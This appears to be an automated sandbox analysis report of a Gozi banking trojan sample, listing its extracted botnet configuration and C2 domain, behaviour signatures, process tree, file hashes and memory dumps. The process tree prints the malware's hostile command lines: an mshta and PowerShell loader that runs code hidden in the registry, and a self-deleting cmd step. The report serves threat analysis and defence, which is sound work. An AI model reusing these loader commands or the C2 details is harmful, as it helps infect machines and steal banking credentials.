gozi | 40bbc905f9521a2892abf91df0ed1678caf43be3c05f2aaf4192707d84f94665

Analysis

max time kernel
151s
max time network
146s
platform
windows10-1703_x64
resource
win10-20230915-en
resource tags

arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system
submitted
13-10-2023 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

url/Amministrazione.url
Size

195B
MD5

ba89826b4115e395e16cb5a1f88b8509
SHA1

9638d1cb1dde598f6b6e6d165f193c972ba3c229
SHA256

e27258c5b05fba296137f8639082a4879f8795b3d3906788e36b59d74eb18062
SHA512

bd348e28231532bea645759b0d0d0ee6a41f83ad4104b3284728bdbfd296080e9540d2a18160f88cd2db0b33797ba7813607860aa92f4bce93c7434ba92f138f

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

8 4896 rundll32.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

4896 rundll32.exe

flow	pid	process
8	4896	rundll32.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2784 set thread context of 3208	2784	powershell.exe	Explorer.EXE
PID 3208 set thread context of 3796	3208	Explorer.EXE	RuntimeBroker.exe
PID 3208 set thread context of 4908	3208	Explorer.EXE	cmd.exe
PID 4908 set thread context of 2332	4908	cmd.exe	PING.EXE
PID 3208 set thread context of 3752	3208	Explorer.EXE	WinMail.exe
PID 3208 set thread context of 4968	3208	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

rundll32.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings rundll32.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2332 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2332 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings	rundll32.exe

pid	process
2332	PING.EXE

pid	process
2332	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid	process
4896	rundll32.exe
4896	rundll32.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE
3208	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2784 powershell.exe
3208 Explorer.EXE
3208 Explorer.EXE
4908 cmd.exe
3208 Explorer.EXE
3208 Explorer.EXE

pid	process
2784	powershell.exe
3208	Explorer.EXE
3208	Explorer.EXE
4908	cmd.exe
3208	Explorer.EXE
3208	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeShutdownPrivilege	3208	Explorer.EXE
Token: SeCreatePagefilePrivilege	3208	Explorer.EXE
Token: SeShutdownPrivilege	3208	Explorer.EXE
Token: SeCreatePagefilePrivilege	3208	Explorer.EXE
Token: SeShutdownPrivilege	3208	Explorer.EXE
Token: SeCreatePagefilePrivilege	3208	Explorer.EXE
Token: SeShutdownPrivilege	3208	Explorer.EXE
Token: SeCreatePagefilePrivilege	3208	Explorer.EXE
Token: SeShutdownPrivilege	3208	Explorer.EXE
Token: SeCreatePagefilePrivilege	3208	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

4984 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3208 Explorer.EXE

pid	process
4984	rundll32.exe

pid	process
3208	Explorer.EXE

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4984 wrote to memory of 4516	4984	rundll32.exe	control.exe
PID 4984 wrote to memory of 4516	4984	rundll32.exe	control.exe
PID 4516 wrote to memory of 4852	4516	control.exe	rundll32.exe
PID 4516 wrote to memory of 4852	4516	control.exe	rundll32.exe
PID 4852 wrote to memory of 4896	4852	rundll32.exe	rundll32.exe
PID 4852 wrote to memory of 4896	4852	rundll32.exe	rundll32.exe
PID 4852 wrote to memory of 4896	4852	rundll32.exe	rundll32.exe
PID 660 wrote to memory of 2784	660	mshta.exe	powershell.exe
PID 660 wrote to memory of 2784	660	mshta.exe	powershell.exe
PID 2784 wrote to memory of 3388	2784	powershell.exe	csc.exe
PID 2784 wrote to memory of 3388	2784	powershell.exe	csc.exe
PID 3388 wrote to memory of 5044	3388	csc.exe	cvtres.exe
PID 3388 wrote to memory of 5044	3388	csc.exe	cvtres.exe
PID 2784 wrote to memory of 4440	2784	powershell.exe	csc.exe
PID 2784 wrote to memory of 4440	2784	powershell.exe	csc.exe
PID 4440 wrote to memory of 2392	4440	csc.exe	cvtres.exe
PID 4440 wrote to memory of 2392	4440	csc.exe	cvtres.exe
PID 2784 wrote to memory of 3208	2784	powershell.exe	Explorer.EXE
PID 2784 wrote to memory of 3208	2784	powershell.exe	Explorer.EXE
PID 2784 wrote to memory of 3208	2784	powershell.exe	Explorer.EXE
PID 2784 wrote to memory of 3208	2784	powershell.exe	Explorer.EXE
PID 3208 wrote to memory of 3796	3208	Explorer.EXE	RuntimeBroker.exe
PID 3208 wrote to memory of 3796	3208	Explorer.EXE	RuntimeBroker.exe
PID 3208 wrote to memory of 3796	3208	Explorer.EXE	RuntimeBroker.exe
PID 3208 wrote to memory of 3796	3208	Explorer.EXE	RuntimeBroker.exe
PID 3208 wrote to memory of 4908	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4908	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4908	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4908	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4908	3208	Explorer.EXE	cmd.exe
PID 4908 wrote to memory of 2332	4908	cmd.exe	PING.EXE
PID 4908 wrote to memory of 2332	4908	cmd.exe	PING.EXE
PID 4908 wrote to memory of 2332	4908	cmd.exe	PING.EXE
PID 4908 wrote to memory of 2332	4908	cmd.exe	PING.EXE
PID 3208 wrote to memory of 3752	3208	Explorer.EXE	WinMail.exe
PID 3208 wrote to memory of 3752	3208	Explorer.EXE	WinMail.exe
PID 3208 wrote to memory of 3752	3208	Explorer.EXE	WinMail.exe
PID 4908 wrote to memory of 2332	4908	cmd.exe	PING.EXE
PID 3208 wrote to memory of 3752	3208	Explorer.EXE	WinMail.exe
PID 3208 wrote to memory of 3752	3208	Explorer.EXE	WinMail.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe
PID 3208 wrote to memory of 4968	3208	Explorer.EXE	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Amministrazione.url
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4984
- C:\Windows\System32\control.exe
  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl",
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl",
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl",
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:4896

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3796

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Pojk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pojk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\E4623AE1-F3D0-B661-9D58-D74A210CFB1E\\\SettingsOptions'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name aeecqkf -value gp; new-alias -name qeqsaa -value iex; qeqsaa ([System.Text.Encoding]::ASCII.GetString((aeecqkf "HKCU:Software\AppDataLow\Software\Microsoft\E4623AE1-F3D0-B661-9D58-D74A210CFB1E").LinkProcess))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4zp4qop\s4zp4qop.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3388
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD603.tmp" "c:\Users\Admin\AppData\Local\Temp\s4zp4qop\CSCC7E7EF784185461BA2AECE95A5C23F1.TMP"
        5⤵
        
        PID:5044
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uidbjzlm\uidbjzlm.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4440
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD75B.tmp" "c:\Users\Admin\AppData\Local\Temp\uidbjzlm\CSCD504ED8CDF9643CC9DA4E950F6DCEC9.TMP"
        5⤵
        
        PID:2392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2332
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:3752
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:4968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl

Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD603.tmp

Filesize
1KB

MD5
3975c5659472d427ccd951582f61631c

SHA1
c4c368f167a335628242fd70f5851cde9b05d7c9

SHA256
597c4e39a4f46f83f81ee38f13c393a41f74766ee1298b5771bba727394d91bf

SHA512
d2922ab1331faf3aa5f2e73a8a10345f9de01629b67b29ad17a3759176d50c59fa6217cfe314345d6a1cfd2113db890c793d1b82693723bfd49bb8c20cdc9261

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD75B.tmp

Filesize
1KB

MD5
f47fe3ab9c7720c72238b2bad28cec99

SHA1
75da6b428ab5352ffc259e3e6ad82b5618856c10

SHA256
04312cc2fe84ca56859c1a4281a37c9c0d40b7d6ef6fb785ce139a294e184d93

SHA512
b2c528fbd61c6d1da61bafa535104d70c33773554222b536896efee5ee7a51bc5d6de5c81fb5192ae92b6e7ee6dc6153bf2d267a372028ec4c478e6535600c36

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ie3tsfed.3yp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\s4zp4qop\s4zp4qop.dll

Filesize
3KB

MD5
b5e858780480a9ec72babea452bbb1e2

SHA1
20a3d449cf3bd35aa7405a5959f35e9c566fe3c8

SHA256
cb66a9f08be5d52298bcc2385a2010038280ababf5d8fe2606d09f962d76bbb1

SHA512
5cc38949730544b678a10e9fabe7d3c47ebbb9ed54bb6228c16895dfca8d2cf58f6f8903c89081c3f3f669077f673be9a5f777d98bd5e038e4b0b16b60e95fe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\uidbjzlm\uidbjzlm.dll

Filesize
3KB

MD5
b2da5578ae4849e5312e3b1c3b229a4c

SHA1
2dfe25b5522b7c26a9f3ba463ff9a2288da15304

SHA256
ed4ba818c5fd76621e98ce068f13455c0d0825f4c8b2f0a5ac07668cd4ff1ddf

SHA512
dcadf71818ce58a95064a7d8025bf91c3807e8ca8e48220fdfa85742e213ff05a116841b761a8446be5cf7a2dbbf365e2c5bf1a32a7ae1c7bf71e130adae4ce9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s4zp4qop\CSCC7E7EF784185461BA2AECE95A5C23F1.TMP

Filesize
652B

MD5
7a86029aca5ea38d9f3445b9db9488f2

SHA1
3aad33945f0348ceb83aac88fa84943982e8d1f0

SHA256
ba0114c820ae2330f02235c59c7fd352d8c4a7d88d323aee07e2f0d60ef73fb9

SHA512
a87b17dda47bcd16dfc5a16c2f5893e52124738e4ae7d908c3e74c120d370bfef8e01800592f1e38e2b989b85a35288b0f848c56c21e043e658d0457890fa732

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s4zp4qop\s4zp4qop.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s4zp4qop\s4zp4qop.cmdline

Filesize
369B

MD5
95429fff3630cb2c7a3a03a28740a2ee

SHA1
b9f25b620354855702dd89c0150581ca7ee40181

SHA256
22aebd29c79b81aa0adfd7abeae09aff3d88b27f58dcfe991bda3b2b99e7121b

SHA512
d4286239ce23d216ff795899d13d995c77d542e0d90f47e8964e3de58489a82e9ef910ad312278e61887bf4565f97ca995681c710ea812e1279c2d0a23618eb0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uidbjzlm\CSCD504ED8CDF9643CC9DA4E950F6DCEC9.TMP

Filesize
652B

MD5
82126f85222c2c7130811bdee1863c83

SHA1
5160493c3464660edf80cbf4d3f42b3ce4d81a1c

SHA256
c7fb0aea55820e060c1a9a5a0a66dc230987c603cdd0a5fa20219b7dc986b081

SHA512
a9f6626a7d57d9a5815ebf58326239e70cd08cbf1cd8cffc0d4aba22f3c49c4b6f7dc5b93609b5a0e383192ecf9f15be1494becb7c0777889267565d78f45570

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uidbjzlm\uidbjzlm.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uidbjzlm\uidbjzlm.cmdline

Filesize
369B

MD5
e9e72bce04781c2005dc0bd739013cb2

SHA1
63d31b71954df93ced277866a1575e2e94642729

SHA256
81dd69cb0fea33e8f939145973d33f1543821b342bf4d1a4e20c2a70bc93546e

SHA512
50abf54010651b601cec7b420cbf080a4062beab91467a4f91498e01c3e7e3fc5e8572914efd2cfd508dbed629e1b484275486f4aefdf0432eff67c717ab2762

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2RZQZMR9\dettagli[1].cpl

Filesize
206KB

MD5
72e2a5c797954e895a41be5b20f867b2

SHA1
419aacfb3ccea9b08277bcc9405054fa4238a597

SHA256
858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

SHA512
77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

Download Submit
memory/2332-116-0x000001533FE50000-0x000001533FE51000-memory.dmp

Filesize
4KB

Download
memory/2332-145-0x0000015340130000-0x00000153401D4000-memory.dmp

Filesize
656KB

Download
memory/2332-115-0x0000015340130000-0x00000153401D4000-memory.dmp

Filesize
656KB

Download
memory/2784-26-0x0000025E9F490000-0x0000025E9F506000-memory.dmp

Filesize
472KB

Download
memory/2784-22-0x0000025E9F2C0000-0x0000025E9F2E2000-memory.dmp

Filesize
136KB

Download
memory/2784-57-0x0000025E86DF0000-0x0000025E86DF8000-memory.dmp

Filesize
32KB

Download
memory/2784-20-0x00007FFB21B60000-0x00007FFB2254C000-memory.dmp

Filesize
9.9MB

Download
memory/2784-23-0x0000025E9F300000-0x0000025E9F310000-memory.dmp

Filesize
64KB

Download
memory/2784-91-0x00007FFB21B60000-0x00007FFB2254C000-memory.dmp

Filesize
9.9MB

Download
memory/2784-92-0x0000025E9F610000-0x0000025E9F64D000-memory.dmp

Filesize
244KB

Download
memory/2784-21-0x0000025E9F300000-0x0000025E9F310000-memory.dmp

Filesize
64KB

Download
memory/2784-71-0x0000025E9F450000-0x0000025E9F458000-memory.dmp

Filesize
32KB

Download
memory/2784-73-0x0000025E9F300000-0x0000025E9F310000-memory.dmp

Filesize
64KB

Download
memory/2784-75-0x0000025E9F610000-0x0000025E9F64D000-memory.dmp

Filesize
244KB

Download
memory/3208-77-0x00000000025A0000-0x0000000002644000-memory.dmp

Filesize
656KB

Download
memory/3208-78-0x0000000000710000-0x0000000000711000-memory.dmp

Filesize
4KB

Download
memory/3208-136-0x00000000025A0000-0x0000000002644000-memory.dmp

Filesize
656KB

Download
memory/3752-121-0x000002BD039D0000-0x000002BD03A74000-memory.dmp

Filesize
656KB

Download
memory/3752-122-0x000002BD021C0000-0x000002BD021C1000-memory.dmp

Filesize
4KB

Download
memory/3752-130-0x000002BD039D0000-0x000002BD03A74000-memory.dmp

Filesize
656KB

Download
memory/3796-98-0x0000019F63320000-0x0000019F63321000-memory.dmp

Filesize
4KB

Download
memory/3796-143-0x0000019F64ED0000-0x0000019F64F74000-memory.dmp

Filesize
656KB

Download
memory/3796-97-0x0000019F64ED0000-0x0000019F64F74000-memory.dmp

Filesize
656KB

Download
memory/4896-6-0x0000000003570000-0x0000000003599000-memory.dmp

Filesize
164KB

Download
memory/4896-114-0x00000000035B0000-0x00000000035BE000-memory.dmp

Filesize
56KB

Download
memory/4896-8-0x0000000003570000-0x0000000003599000-memory.dmp

Filesize
164KB

Download
memory/4896-7-0x00000000035B0000-0x00000000035BE000-memory.dmp

Filesize
56KB

Download
memory/4896-9-0x00000000035B0000-0x00000000035BE000-memory.dmp

Filesize
56KB

Download
memory/4896-10-0x00000000035D0000-0x00000000035DD000-memory.dmp

Filesize
52KB

Download
memory/4908-107-0x000002308A010000-0x000002308A011000-memory.dmp

Filesize
4KB

Download
memory/4908-106-0x000002308A2D0000-0x000002308A374000-memory.dmp

Filesize
656KB

Download
memory/4908-144-0x000002308A2D0000-0x000002308A374000-memory.dmp

Filesize
656KB

Download
memory/4968-138-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/4968-135-0x0000000003490000-0x0000000003528000-memory.dmp

Filesize
608KB

Download
memory/4968-142-0x0000000003490000-0x0000000003528000-memory.dmp

Filesize
608KB

Download